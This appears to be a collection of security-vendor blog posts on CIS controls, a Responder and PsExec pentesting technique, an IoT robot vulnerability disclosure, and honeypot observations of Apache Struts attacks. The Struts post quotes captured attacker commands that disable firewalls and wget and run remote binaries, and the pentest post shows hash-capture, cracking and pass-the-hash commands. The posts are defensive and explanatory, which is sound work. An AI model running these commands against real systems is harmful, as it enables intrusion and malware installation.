
The ultimate goal of an information security program is to reduce risk. Often, hidden risks run amok in organizations that just aren't thinking about risk in the right way. Control 5 of the CIS Critical Security Controls can be contentious, can cause bad feelings, and is sometimes hated by system administrators and users alike. It is, however, one of the controls that can have the largest impact on risk, which makes both the control itself and the conversation around why it matters worth your time. We'll talk about both.

 

Misuse of privilege is a primary method for attackers to land and expand inside networks. Two very common attacks rely on privilege to execute. The first is when a user running with privilege is tricked into opening a malicious attachment, or picks up malware from a drive-by website, where it loads silently in the background. Privileged accounts make these attacks succeed quickly: the user's machine can be controlled, keylogging can be installed, or running malicious processes can be hidden from view.

 

The second common technique is elevation of privilege: guessing or cracking the password of an administrative user to gain access to a target machine. The risk increases considerably if the password policy is weak (8 characters is not sufficient!) or not enforced.

 

What it is

Reducing administrative privilege specifically means not running services or accounts with admin-level access all the time. It does not mean that no one should have admin; it means admin privilege should be heavily restricted to only those users whose jobs, and more specifically whose tasks, require it.

 

Regular, normal users of a system should never require admin privilege to do daily tasks. Superusers of a system might require admin access for certain tasks, but don’t necessarily need it all the time. Even system administrators do not require admin level access 100% of the time to do their jobs. Do you need admin access to read & send emails? Or search the web?

 

 

How to implement it

There are many different ways to implement restrictions on admin privilege, but you are first going to have to deal with the political issue of why you're doing this. Trust me, addressing this up front saves you a lot of heartache later on.

 

The political stuff

Case #1: All users have admin, whether local admin rights, privileged accounts, or both

 

My first question, when I see this happening in any organization, is “why do they need this?”

 

Typical answers are:

  • They need to install software [HINT: no they don’t.]
  • Applications might fail to work [Possible but unlikely; the app might just be installed improperly.]
  • They need it to print!!! [No.]
  • My executives demand it [They demand a lot in IT without understanding. Help them understand. See below.]
  • Why not? [Seriously?]

 

Some of these are valid responses. The problem is that we don't understand the root issue driving the belief that everyone needs admin-level access to do their daily duties, and this is probably true of many organizations. It's simpler just to give everyone admin access because things will then work, but you create loads of risk when you do. You have to take the time to determine which functions actually need the access, and remove it from the functions that don't, to lower the risk and the attack surface.

 

All of these responses speak to worries about not being able to perform a business function when needed. They also imply that the people in charge of approving these permissions don't really understand the risks of granting them. We need to get them to understand that the small cost of occasionally having to request admin is far outweighed by the much higher risk of having it when attackers strike.

 

Case #2: Your admins say they have to have it “to do their jobs”

 

I don't disagree with this statement. Admins do need admin rights to do some tasks, but not every task calls for them. Do this exercise: list all the tasks an admin performs on an average day, then mark each task that does not require admin privilege to accomplish. Show that list to the person responsible for managing risk in your organization. Then simply create a separate, normal user account for your admins and require them to use it for all of the marked tasks. For everything else, they escalate into their admin account and de-escalate when done. It's an extra step, and it's a more secure one.
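
To make that workflow concrete, here is a minimal sketch of what escalation and de-escalation can look like on a Linux host (the account and host names are made up, and your sudo policy will differ); on Windows, the equivalent is launching the specific tool with runas /user:DOMAIN\admin-account or "Run as different user."

# Day-to-day work happens in the unprivileged account
jdoe@host:~$ whoami
jdoe

# Escalate only for the task that needs it...
jdoe@host:~$ sudo systemctl restart nginx

# ...or open a root shell for a longer admin task, then drop back out when done
jdoe@host:~$ sudo -i
root@host:~# exit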

 

The conversation


Now have the conversation. It may be painful. I have been in meetings where people got so mad they threw things, or were in tears, when we told them we were "taking away" their privilege. This is why we say "reducing" or "controlling." These are important words. The phrase is "we're reducing/controlling risk by allowing you to use your privilege only for tasks that require it." For executives who demand admin, point out that their status makes them among the highest risks to the organization and frequent high-value targets for attackers.

 

Then support your conversation with information from around the web: whitepapers, studies, anything that helps drive your point home.

 

For example, this article from Avecto illustrates that 97% of critical Windows vulnerabilities are mitigated by removing admin rights, allowing you to focus on the remaining 3% and be more effective. Search around; there's lots more good supporting material.

 

This does not need to be an expensive exercise. Using techniques like Windows delegation of authority, you can give users administrative privilege for specific tasks, such as delegating to your help desk the ability to disable accounts or move them to different OUs; they don't need full admin to do this. On Linux systems, using sudo instead of an interactive root shell is much less risky.

 

If you are a compliance-driven organization, most compliance frameworks require reducing admin privilege as part of access controls. Here's a brief glimpse of some compliance requirements that are addressed by Control 5:

 

  • PCI Compliance Objective “Implement strong access control measures”
    • Sections 7.1, 7.2, 7.3, 8.1, 8.2, 8.3, 8.7

 

  • HIPAA Compliance 164.308(a)(4)(ii)(B)
    • Rights and/or privileges should be granted to authorized users based on a set of access rules that the covered entity is required to implement as part of § 164.308(a)(4), the Information Access Management standard under the Administrative Safeguards section of the Rule.

 

  • FFIEC (Federal Financial Institutions Examination Council)
    • Authentication and Access Controls

 

The technical stuff

Reducing admin privilege supports the Pareto principle, or the 80/20 rule. Effectively, reducing admin privilege, combined with the first four CIS critical security controls, can reduce the risks in your organization by 80% or more, allowing you to focus on the remaining 20%. It's very likely the risk reduction is even higher. The Australian Signals Directorate lists restricting administrative privileges in its Top 4 Mitigation Strategies, along with elements of Control 2 (application whitelisting) and Control 4 (an ongoing patching program).

 

Here is Microsoft’s guidance on implementing Least-Privilege Administrative Models. If you use Active Directory and are on a Windows domain this is very helpful in making meaningful changes to your admin models.

 

For Linux environments, each sysadmin should have a separate account and use the ‘su’ command to gain root only when needed. Better yet, disable (or restrict) su and enforce the use of the ‘sudo’ command.
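
As a rough illustration (file paths and group names vary by distribution, so treat this as a sketch rather than a drop-in config), su can be limited to a specific group via pam_wheel, while sudo grants admins the access they need with every command logged per user:

# /etc/pam.d/su -- only members of the wheel group may use su at all
auth       required     pam_wheel.so use_uid

# /etc/sudoers -- edit with visudo; members of wheel run admin commands through sudo
%wheel     ALL=(ALL)    ALL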

 

There are also third parties who sell software that can help with this, such as CyberArk Viewfinity, Avecto PrivilegeGuard, BeyondTrust PowerBroker, or Thycotic Privilege Manager. Note that Rapid7 does not partner with these companies, but we recommend them based on what we see other organizations deploying.

 

All the other things

As with most of the controls, the sub-controls also list other precautions.

 

  • Change all default passwords on all deployed devices
  • Use multi-factor authentication for all administrative access
  • Use long passwords (14 characters or more)
  • Require system admins to have a normal account and a privileged account, and access the privileged account through an escalation mechanism, such as sudo for Linux or RunAs for Windows.
  • Configure systems to issue alerts on unsuccessful logins to admin accounts. Rapid7 offers products such as InsightIDR which can detect and alert on these events. One use case: if an admin leaves for vacation, monitor their account so that any login attempt during that window triggers an investigation.
  • As an advanced control, perform admin tasks only on dedicated machines that are isolated from the rest of the network and allowed to connect only to the systems they need to administer.

 

Reducing or controlling admin is not hard to implement. However, it is a change to the way things are being done, and fear of change is very powerful. Do your best to have conversations that ease the fear. You are not taking anything away. You are simply making it harder for high-impact errors to occur, and you are reducing the risk that an attacker can easily compromise an account, a system, file shares, sensitive data, and more.

 

Related Resources

 

CIS Critical Control 1: Inventory of Authorized and Unauthorized Devices Explained

CIS Critical Control 2: Inventory of Authorized and Unauthorized Software Explained

CIS Critical Control 3: Secure Configurations for Hardware & Software Explained

CIS Critical Control 4: Continuous Vulnerability Assessment & Remediation

By Emilie St-Pierre, TJ Byrom, and Eric Sun

 

Ask any pen tester what their top five penetration testing tools are for internal engagements, and you will likely get a reply containing nmap, Metasploit, CrackMapExec, SMBRelay and Responder.

 

 

An essential tool for any whitehat, Responder is a Python script that listens for Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS) and Multicast Domain Name System (mDNS) broadcast messages (try saying that out loud 5 times in a row!). It is authored and maintained by Laurent Gaffie and is available via its GitHub repository, located at https://github.com/lgandx/Responder.

 

Once you find yourself on an internal network, Responder will quickly and stealthily get user hashes when systems respond to the broadcast services mentioned above. Those hashes can then be cracked with your tool of choice. As Responder’s name implies, the script responds to the broadcast messages sent when a Windows client queries a hostname that isn’t located within the local network’s DNS tables. This is a common occurrence within Windows networks, and a penetration tester doesn’t need to wait too long before capturing such broadcast traffic. Behold our beautiful diagram to help visualize this concept:

 

Because the client views any reply as legitimate, Responder is able to send its own IP as the query answer, no questions asked. Once it receives the answer, the client sends its authentication details to the malicious IP, resulting in captured hashes. And believe us, it works - we've seen penetration testers get hashes in a matter of seconds using this tool, which is why it is used early within an internal engagement's timeline.

 

If no hashes are captured via the first method, Responder can also be used to man-in-the-middle Internet Explorer Web-Proxy Autodiscovery Protocol (WPAD) traffic. In a similar manner to the previous attack, Responder replies with its own IP address for clients querying the network for the “wpad.dat” Proxy Auto-Config (PAC) file. If successful, Responder once again grabs hashes which can then be cracked or, if time is of the essence, used to pass-the-hash with PsExec (PsExec examples) as we will demonstrate below.

Once hashes have been captured, it's time to get cracking! Responder saves all hashes in John Jumbo-compliant output files and a SQLite database. A reliable cracking tool such as John the Ripper can be used to complete this step. Even if cracking is unsuccessful, hashes can be used to validate access to other areas of the target network. This is the beauty of using Responder in conjunction with PsExec.
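
As a rough sketch of that workflow (the interface name, flags, and file paths are illustrative and vary by Responder version and wordlist location), a tester might run something like:

# Listen on the internal interface and poison LLMNR/NBT-NS/mDNS responses
sudo python Responder.py -I eth0

# Captured NetNTLMv2 hashes land in Responder's logs directory; feed one to John
john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt logs/SMB-NTLMv2-SSP-10.0.0.50.txt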

 

PsExec is a Windows-based administrative tool which can be leveraged to move laterally around the target network. It is useful for launching executables, command prompts and processes on remote systems. There are numerous tools available for penetration testers who wish to take advantage of PsExec's availability within a network. For example, Metasploit has over 7 PsExec-related modules, its most popular ones being psexec and psexec_psh. There's also the previously-mentioned Windows executable and Core Security's Impacket psexec Python script. All are potential options depending on the penetration tester's preferences and tool availability.
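
As one illustration (the host, domain, user, and hash below are placeholders), Metasploit's psexec module accepts either a cracked password or an LM:NTLM hash pair in SMBPass, which is what makes pass-the-hash possible when cracking isn't practical:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.0.0.25
msf exploit(psexec) > set SMBDomain CORP
msf exploit(psexec) > set SMBUser administrator
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf exploit(psexec) > run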

 

 

 

Many networks today struggle to reliably detect remote code execution, which is why it's very common for penetration testers to use Responder and PsExec in the early stages of an engagement. These attacks succeed because of default Windows environment configurations, as well as protocol behavior that, by default, trusts all responses.

 

Fortunately, such attacks can be prevented and detected. The first attack we mentioned, which relies on Responder's broadcast poisoning, can be prevented by disabling LLMNR and NBT-NS. Since networks already use DNS, these protocols aren't required unless you're running certain instances of Windows 2000 or earlier (in which case, we recommend a New Year's resolution of upgrading your systems!).
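
For reference, these are the settings involved; in practice you would push the LLMNR change through the "Turn off multicast name resolution" Group Policy and the NetBIOS change through DHCP scope options or your build image, so treat the raw registry locations below as a sketch:

# Disable LLMNR (the registry value behind the "Turn off multicast name resolution" GPO)
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient
    EnableMulticast (DWORD) = 0

# Disable NetBIOS over TCP/IP, set per network interface
HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_{interface GUID}
    NetbiosOptions (DWORD) = 2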

 

To prevent the second showcased Responder attack, which abuses WPAD traffic, it is simply a matter of adding a DNS entry for ‘WPAD’ pointing to the corporate proxy server. You can also disable Autodetect Proxy Settings on your IE clients to prevent this attack from happening.

 
If your company uses Rapid7's InsightIDR, you can detect use of either Responder or PsExec. Our development team works closely with our pen-test and incident response teams to continuously add detections across the Attack Chain. For that reason, the Insight Endpoint Agent collects, in real time, the data required to detect remote code execution and other stealthy attack vectors. For a 3-minute overview of InsightIDR, our incident detection and response solution that combines User Behavior Analytics, SIEM, and EDR, check out the video below.

 

Rapid7 InsightIDR 3-Min Overview - YouTube

 

References:

https://github.com/lgandx/Responder

https://technet.microsoft.com/en-us/sysinternals/pxexec.aspx

https://community.rapid7.com/community/metasploit/blog/2013/03/09/psexec-demystified

https://github.com/CoreSecurity/impacket/blob/master/examples/psexec.py

http://www.openwall.com/john/

https://www.microsoft.com/en-us/download/details.aspx?id=36036

https://www.sans.org/reading-room/whitepapers/testing/pass-the-hash-attacks-tools-mitigation-33283

Welcome to the fourth blog post on the CIS Critical Security Controls! This week, I will be walking you through the fourth Critical Control: Continuous Vulnerability Assessment & Remediation. Specifically, we will be looking at why vulnerability management and remediation is important for your overall security maturity, what the control consists of, and how to implement it.

 

Organizations operate in a constant stream of new security information: software updates, patches, security advisories, threat bulletins, etc. Understanding and managing vulnerabilities has become a continuous activity that requires a significant amount of time, attention and resources. Attackers have access to the same information, but have significantly more time on their hands. This lets them take advantage of gaps between the appearance of new knowledge and remediation activities.

 

If an organization does not proactively scan for vulnerabilities and address discovered flaws, the likelihood of its computer systems becoming compromised is high - kind of like building and installing an ornate gate with no fence. Identifying and remediating vulnerabilities on a regular basis is also essential to a strong overall information security program.

 

What it is:

The Continuous Vulnerability Assessment and Remediation control is part of the “systems” group of the 20 critical controls. This control consists of eight (8) different sections: 4.1 and 4.3 give guidelines for performing vulnerability scans, 4.2 and 4.6 cover the importance of monitoring and correlating logs, 4.4 addresses staying on top of new and emerging vulnerabilities and exposures, 4.5 and 4.7 pertain to remediation, and 4.8 covers establishing a process to assign risk ratings to vulnerabilities.

 

How to implement it

To best understand how to integrate each section of this control into your security program, we’re going to break them up into the logical groupings I described in the previous section (scanning, logs, new threats and exposures, risk rating, and remediation).

 

A large part of vulnerability assessment and remediation has to do with scanning, as evidenced by the fact that two sections directly pertain to scanning and two others indirectly reference it by discussing the monitoring of scanning logs and the correlation of logs to ongoing scans. The frequency of scanning will largely depend on how mature your organization is from a security standpoint and how easily it can adopt a comprehensive vulnerability management program. Section 4.1 specifically states that vulnerability scanning should occur weekly, but we know that is not always possible due to various circumstances. This may mean monthly scans for organizations without a well-defined vulnerability management process, or weekly for those that are better established. Either way, when performing these scans it is important to have both an internal and an external scan perspective. This means machines that are internally facing only should have authenticated scans performed on them, and outward-facing devices should have both authenticated and unauthenticated scans performed.

 

Another point to remember about performing authenticated scans is that the administrative account being used for scans should not be tied to any particular user. Since these credentials will have administrative access to all devices being scanned, we want to decrease the risk of them getting compromised. This is also why it is important to ensure all of your scanning activities are being logged, monitored, and stored.

 

Depending on the type of scan you are running, your vulnerability scanner should be generating at least some attack detection events. It is important that your security team is able to (1) see that these events are being generated and (2) match them to scan logs in order to determine whether the exploit was used against a target known to be vulnerable as part of a scan, rather than as part of an actual attack. Additionally, scan logs and alerts should be generated and stored to track when and where the administrative credentials were used. This way, we can confirm the credentials are only being used during scans, and only on devices for which their use has been approved.

 

So now that we have discussed scanning and logs, we are going to address how you can keep up with all of the vulnerabilities being released. There are several sites and feeds that you can subscribe to in order to stay on top of new and emerging vulnerabilities and exposures.

 

It isn't enough to just be alerted to new vulnerabilities, however; we need to take the knowledge we have about our environment into consideration and then determine how these vulnerabilities will impact it. This is where risk rating comes into play. Section 4.8 states that we must have a process to risk-rate a vulnerability based on exploitability and potential impact, and then use that rating to prioritize remediation. What it doesn't spell out for us is what this process looks like. Typically, when we work with an organization, we recommend that for each asset they take three factors into consideration:

  1. Threat Level – How would you classify the importance of the asset in terms of the data it hosts as well as its exposure level? For example, a web server may pose a higher level of threat than a device that isn’t accessible via the Internet.
  2. Risk of Compromise – What is the likelihood that the vulnerability will be used to compromise this system? Keep in mind how easy the vulnerability is to exploit, whether it requires user interaction, and so on.
  3. Impact of Compromise – What is the impact to the confidentiality, integrity, and availability of the system and the data it hosts should a particular vulnerability get exploited?

 

After our scans are complete and we are staring at the long list of vulnerabilities found on our systems, we need to determine the order in which we will do remediation.

 

In order to ensure patches are being applied across all systems within the organization, it is recommended to deploy and use an automated patch management tool as well as a software update tool. As you look to increase the overall security maturity of your organization, you will see that these tools are necessary if you want a standardized and centrally managed patching process. In more mature organizations, part of the remediation process will include pushing patches, updates, and other fixes to a single host initially. When the patching effort is complete on this one device, the security team performs a scan of that device to ensure the vulnerability was remediated prior to pushing the fix across the entire organization via the aforementioned tools. Tools alone are not enough to ensure that patches were fully and correctly applied, however. Vulnerability management is an iterative process, which means that vulnerability scans that occur after remediation should be analyzed to ensure that vulnerabilities that were supposed to be remediated are no longer showing up on the report.
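
A quick manual spot check on that pilot host can back up what the scanner reports; for example, on a Red Hat-style system (the package name and CVE prefix are illustrative):

# Confirm the updated package version actually landed
rpm -q openssl

# Check whether the installed package's changelog mentions the advisory you care about
rpm -q --changelog openssl | grep CVE-2017-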

 

Vulnerability management software helps you identify the holes that can be used during an attack and how to seal them before a breach happens. But it’s more than launching scans and finding vulnerabilities; it requires you to create processes around efficient remediation and to ensure that the most critical items are being fixed first. What you do with the data you uncover is more important than simply finding vulnerabilities, which is why we recommend integrating the processes around each section of Critical Control 4.

 


 

This post describes three vulnerabilities in the Double Robotics Telepresence Robot ecosystem related to improper authentication, session fixation, and weak Bluetooth pairing. We would like to thank Double Robotics for their prompt acknowledgement of the vulnerabilities, and in addressing the ones that they considered serious. Two of the three vulnerabilities were patched via updates to Double Robotics servers on Mon, Jan 16, 2017.

 

Credit

These issues were discovered by Rapid7 researcher Deral Heiland. They were reported to Double Robotics and CERT/CC in accordance with Rapid7's disclosure policy.

 

Product Affected

The Double Telepresence Robot is a mobile conferencing device. Its mobility allows the remote user to roam around an office for meetings and face-to-face conversations.

 

Vendor Statement

From Double Robotics' co-founder and CEO, David Cann:

At Double Robotics, we seek to provide the best experience possible for our customers, which means not only providing an agile, innovative technology, but also, the highest level of safety and security. Rapid7's thorough penetration tests ensure all of our products run as securely as possible, so we can continue delivering the best experience in telepresence. Before the patches were implemented, no calls were compromised and no sensitive customer data was exposed. In addition, Double uses end-to-end encryption with WebRTC for low latency, secure video calls.

 

Summary of Vulnerabilities

  • R7-2017-01.1: Unauthenticated access to data
    • An unauthenticated user could gain access to Double 2 device information including: device serial numbers, current and historical driver and robot session information, device installation_keys, and GPS coordinates.
  • R7-2017-01.2: Static user session management
    • The access token (also referred to as the driver_token), which is created during account assignment to a robot, was never changed or expired. If this token were compromised, it could be used to take control of a robot without a user account or password.
  • R7-2017-01.3: Weak Bluetooth pairing
    • The pairing process between the mobile application (iPad) and the robot drive unit does not require the user to know the challenge PIN. A malicious actor can therefore download the Double Robot mobile application from the Internet, pair with the drive unit, and use the application (along with the web services) to take control of the drive unit.

 

Vulnerability Details and Mitigations

R7-2017-01.1: Unauthenticated access to data

In the following example, critical information related to a session was accessed using the URL “https://api.doublerobotics.com/api/v1/session/?limit=1&offset=xxxxxxx&format=json”. By incrementing the "offset=" number, information for all historical and current sessions could be enumerated:

 

[Screenshot: f2.png]

 

In the next example, robot and user installation keys were enumerated by incrementing the "offset=" number in the URL https://api.doublerobotics.com/api/v1/installation/?limit=1&offset=xxxxxxx&format=json as shown below:

 

[Screenshot: f3.png]

 

On Mon, Jan 16, 2017, Double deployed a server patch to mitigate this issue.

R7-2017-01.2: Static user session management

Although the driver_token is a complex, unique, 40-character token (and so unlikely to be guessed), it can still be obtained by anyone who has access to the Double Robot iPad or who succeeds in mounting an SSL man-in-the-middle attack against the device. For example, via a successful man-in-the-middle attack or access to the robot iPad's cache.db file, a malicious actor could identify the robot_key as shown below:

 

[Screenshot: f4.png]

 

[Screenshot: f5.png]

 

Using this robot_key, an unauthenticated user could enumerate all of the user access tokens (driver_tokens) which allow remote control access of the robot. An example of this enumeration method is shown below:

 

[Screenshot: f6.png]

 

On Mon, Jan 16, 2017, Double Robotics deployed a server patch to mitigate this issue. The API queries described above no longer expose related session tokens to the Double device.

 

R7-2017-01.3: Weak Bluetooth pairing

The exposure of this vulnerability is limited since the unit can only be paired with one control application at a time. In addition, the malicious actor must be close enough to establish a Bluetooth connection. This distance can be significant (up to 1 mile) with the addition of a high-gain antenna.

 

On Mon, Jan 16, 2017, Double Robotics indicated it did not see this as a significant security vulnerability, and that it does not currently plan to patch. Users should ensure that the driver assembly remains paired to the control iPad to avoid exposure.

 

Disclosure Timeline

This vulnerability advisory was prepared in accordance with Rapid7's disclosure policy.

  • Dec 2016: Discovered by Rapid7's Deral Heiland
  • Mon, Jan 09, 2017: Disclosed to Double Robotics
  • Mon, Jan 09, 2017: Double Robotics acknowledged the vulnerabilities
  • Mon, Jan 16, 2017: R7-2017-01.1 and R7-2017-01.2 were fixed by Double Robotics via server patches
  • Tue, Jan 24, 2017: Disclosed to CERT/CC
  • Wed, Jan 25, 2017: Rapid7 and CERT/CC decided not to issue CVEs for these vulnerabilities. R7-2017-01.01 and 01.02 were present in Double's web application server; as there was only one instance of the affected software, and no user action was required to apply the fixes, no CVE is warranted. R7-2017-01.03 is an exposure for users to be aware of, but it only allows control of the drive unit if pairing is successful. User data cannot be modified without additional compromise.
  • Sun, Mar 12, 2017: Disclosed to the public

Stop number 3 on our tour of the CIS Critical Security Controls (previously known as the SANS Top 20 Critical Security Controls) deals with Secure Configurations for Hardware & Software. This is great timing with the announcement of the death of SHA1. (Pro tip: don’t use SHA1). The Critical Controls are numbered in a specific way, following a logical path of building foundations while you gradually improve your security posture and reduce your exposure. Control 1: Inventory of Authorized and Unauthorized Devices, and Control 2: Inventory of Authorized and Unauthorized Software are foundational to understanding what you have. Now it’s time to shrink that attack surface by securing the inventory in your network.

 

As stated in the control description, default configurations for operating systems and applications are normally geared toward ease-of-deployment and not toward security. This means open and running ports and services, default accounts or passwords, older and more vulnerable protocols (I’m looking at YOU telnet), pre-installed and perhaps unnecessary software, and the list goes on. All of these are exploitable in their default state.

 

The big question is, what constitutes secure configurations? As with most questions in information security, the answer is contextual, based on your business rules. So before you attempt a secure configuration, you need to have some understanding of what your business needs to do and what it does today. This means a lot of detailed analysis of your applications, and it can be a complex task. It is also a continuous process, not just “one and done.” Secure configuration must be continually managed to avoid security decay. As you implement vulnerability management, your systems and applications will be patched and updated, and this will change your position on secure configurations. Configurations will also change based on new software or operational support changes, and if they are not kept secure, attackers will take advantage of the opportunities to exploit both network-accessible services and client software.

 

What It Is

Secure Configurations for Hardware & Software is part of the “systems” group of the CIS critical security controls. This means it is handled in the back office by IT and security, and should not be handled by users in the front office. It's very likely that your organization is using some kind of secure configs unless you run 100% out-of-the-box. Rapid7 finds that most orgs do not go far enough, however, and a lot of exposure exists that has no defined business purpose or need.

 

This control is broken down into seven sub-controls. The sub-controls describe the entire process of managing secure configurations, but do not go into specifics about the configurations themselves. So we will cite resources here you can use to help you start to securely configure your enterprise (and even your home systems).

 

How to Implement It


There are many ways to go about secure configurations, and it’s likely that not everything publicly available is going to be completely relevant. Like you would with a deny all rule in a firewall deployment, approach these with a mindset of starting as small as you can and gradually opening up your systems and applications until they are usable. This is great for new systems or those yet to be deployed. But what about older systems? It’s not very likely you can just shut them down and work this process. Still, you should seek to reduce the running services and ports, especially those which are known to be vulnerable and not in use.

 

The Configs

There are a number of usable resources for secure configurations. Rapid7 regularly recommends to clients the following:

 

  • NIST 800-70 rev 3
    • This NIST special publication is a document that governs the use of checklists; it is not itself a configuration guide. It is most valuable in breaking down configuration levels when using multiple checklists. This is especially useful in complex business environments, where you will need many different configuration baselines for your systems. It also contains information on developing, evaluating and testing your checklists.
  • National Vulnerability Database (NVD)
    • The NVD, maintained by NIST, is a great repository for many things in control 4 (Vulnerability Management), and it is also useful for control 3 through its checklists. This repo contains SCAP content, Group Policy Objects for Active Directory, and human-readable settings. It is a great starting point for any secure configuration activity.
  • CIS Benchmarks
    • Sometimes referred to as hardening guides, their official name is the CIS Benchmarks. Curated by the same organization that handles the Critical Controls, the CIS Benchmarks are available for multiple operating systems, web browsers, mobile devices, virtualization platforms and more. You can also get SCAP-compliant checklists in XCCDF format for direct application to systems.
  • Security Technical Implementation Guide (STIG)
    • The STIGs are curated by the federal government, adhering to rules and guidelines issued by the Department of Defense. These pages contain actual configuration templates (some in SCAP format) that can be directly applied to systems. There are also templates for cloud-based services, application security and a lot of training references. STIGs are great, but not for the faint of heart, or for organizations who don’t have a deep technical understanding of the application or OS they’re attempting to reconfigure. So handle them with caution, but they are very helpful in locking down systems.

 

Minimum Standards

All of the above resources are based on consensus and community or government standards and are considered to be sound strategies to reduce your attack surface. They are not comprehensive, and as already stated your mileage may vary and you should take a customized approach that best supports your business needs.


At the end of the day, what you are looking to do is maintain a set of minimum standards for your configs. You can pore through the checklists for ideas: disable IPv6 if it is not necessary, don't use RDP without TLS, and don't ever run telnet for any reason, ever. Did I mention not to run telnet? Build your checklist and use it for all your deployments, and don't forget about your existing and vulnerable systems! They need extra love too.
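
As a small illustration of turning a checklist item into practice on a Linux host (service and unit names vary by distribution; this is a sketch, not a complete hardening script):

# See what is actually listening before you start trimming
ss -tlnp

# Telnet has no business running; disable and stop it if present
systemctl disable --now telnet.socket

# Review everything else that starts at boot
systemctl list-unit-files --state=enabled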

 

Rapid7 observes many organizations that know they have a vulnerable legacy system that they cannot modify directly to reduce the attack surface. If you have one of these brittle/fragile/unfixable systems, consider ways to limit inbound/outbound access and connectivity to help mitigate the risk until it can be upgraded or replaced with something more securable.

 

All The Other Things

Everything above talks about the first sub-control, which is the secure config itself. There are several more things this control covers, such as:

  • Follow strict configuration management processes for all changes to your secure builds.
  • Create master images (gold images) that are secure, and store those in a safe and secure location so they can’t be altered.
  • Perform remote administration only over secure channels, and use a separate administration network if possible.
  • Use file integrity checking tools or application whitelisting tools to ensure your images are not being altered without authorization.
  • Verify your testable configurations and automate this as much as possible – run your vulnerability scanner against your gold image on a regular frequency and use SCAP to streamline reporting and integration (see the example command after this list).
  • Deploy configuration management tools (SCCM, Puppet/Chef, Casper) to enforce your secure configurations once they are deployed.
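
For the SCAP piece above, the open-source OpenSCAP tooling can evaluate a host or gold image against an XCCDF profile; the profile ID and content path below are illustrative and depend on the SCAP content you download:

# Evaluate the system against a chosen benchmark profile and produce a report
oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_standard --results results.xml --report report.html /usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml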

 

As you can see, there's quite a bit to getting your systems and applications secured, as well as having processes to support the ongoing care and feeding of your secure configs. This is a foundational control, so it's important to get it right and keep improving continually. Putting the required time and effort into this will yield a lot of return, simply because your exposure will have shrunk significantly, allowing you to focus on more advanced security measures without worrying about some PowerShell script kiddie popping your box because of insecure telnet. Oh, by the way, you should probably disable telnet.

 

For more posts examining the CIS Critical Security Controls, search for the tag "CIS 20."

UPDATE - March 10th, 2017: Rapid7 added a check that works in conjunction with Nexpose’s web spider functionality. This check will be performed against any URIs discovered with the suffix “.action” (the default configuration for Apache Struts apps). To learn more about using this check, read this post.

 

UPDATE - March 9th, 2017:  Scan your network for this vulnerability with check id apache-struts-cve-2017-5638, which was added to Nexpose in content update 437200607.

 

Attacks spotted in the wild

Yesterday, Cisco Talos published a blog post indicating that they had observed in-the-wild attacks against a recently announced vulnerability in Apache Struts. The vulnerability, CVE-2017-5638, permits unauthenticated Remote Code Execution (RCE) via a specially crafted Content-Type value in an HTTP request. An attacker can create an invalid value for Content-Type which will cause vulnerable software to throw an exception.  When the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed.

 

World Wide Window into the Web

For some time now Rapid7 has been running a research effort called Heisenberg Cloud. The project consists of honeypots spread across every region of five major cloud providers, as well as a handful of collectors in private networks. We use these honeypots to provide visibility into the activities of attackers so that we can better protect our customers as well as provide meaningful information to the public in general. Today, Heisenberg Cloud helped provide information about the scope and scale of the attacks on the Apache vulnerability. In the coming days and weeks it will provide information about the evolution and lifecycle of the attacks.

 

A few words of caution before I continue: please keep in mind that the accuracy of IP physical location here is at the mercy of geolocation databases and it's difficult to tell who the current 0wner(s) of a host are at any given time. Also, we host our honeypots in cloud providers in order to provide broad samples. We are unlikely to see targeted or other scope-limited attacks.

 

Spreading malware

We use Logentries to query our Heisenberg data and extract meaningful information. One notable aspect of the attacks is how the malicious traffic has changed over recent days. The graph below shows a 72-hour window in time.

 

 

The first malicious requests we saw were a pair on Tuesday, March 7th at 15:36 UTC that originated from a host in Zhengzhou, China. Both were HTTP GET requests for /index.aciton (misspelled) and the commands that they executed would have caused a vulnerable target to download binaries from the attacking server. Here is an example of the commands that were sent as a single string in the Content-Type value:

 

cd /dev/shm;
wget http://XXX.XXX.XXX.92:92/lmydess;
chmod 777 lmydess;
./lmydess;

 

I've broken the command into lines to make it easier to read. It's pretty standard for a command injection or remote code execution attack against web servers. Basically, move to some place writeable, download code, make sure it's executable, and run it.

 

After this, the malicious traffic seemed to stop until Wednesday, March 8th at 09:02 UTC when a host in Shanghai, China started sending attacks. The requests differed from the previous attacks. The new attacks were HTTP POSTs to a couple different paths and attempted to execute different commands on the victim:

 

/etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;
wget -c http://XXX.XXX.XXX.26:9/7;
chmod 777 7;
./7;

 

This is similar to the prior commands but this attacker tries to stop the firewall first. The requested binary was not hosted on the same IP address that attacked the honeypot. In this case the server hosting the binary was still alive and we were able to capture a sample.  It appears to be a variant of the XOR DDoS family.

 

Not so innocent

Much like Talos, in addition to the attempts to spread malware, we see some exploitation of the vulnerability to run "harmless" commands such as whois, ifconfig, and a couple variations that echoed a value. The word harmless is in quotes because though the commands weren't destructive they could have allowed the originator of the request to determine if the target was vulnerable. They may be part of a research effort to understand the number of vulnerable hosts on the public Internet or an information gathering effort as part of preparation for a later attack. Irrespective of the reason, network and system owners should review their environments.

 

A little sunshine

Based on the traffic we are seeing at this time, the bulk of the non-targeted malicious traffic appears to be limited attacks from a couple of sources. This could change significantly tomorrow if attackers determine that there is value in exploiting this vulnerability. If you are using Apache Struts, this would be a great time to review Apache's documentation on the vulnerability and then survey your environment for vulnerable hosts. Remember that Apache products are often bundled with other software, so you may have vulnerable hosts of which you are unaware. Expect Nexpose and Metasploit coverage to be available soon to help with detection and validation efforts. If you do have vulnerable implementations of the software in your environment, I would strongly recommend upgrading as soon as safely possible. If you cannot upgrade immediately, you may wish to investigate other mitigation efforts such as changing firewall rules or network equipment ACLs to reduce risk. As always, it's best to avoid exposing services to public networks if at all possible.

 

Good luck!

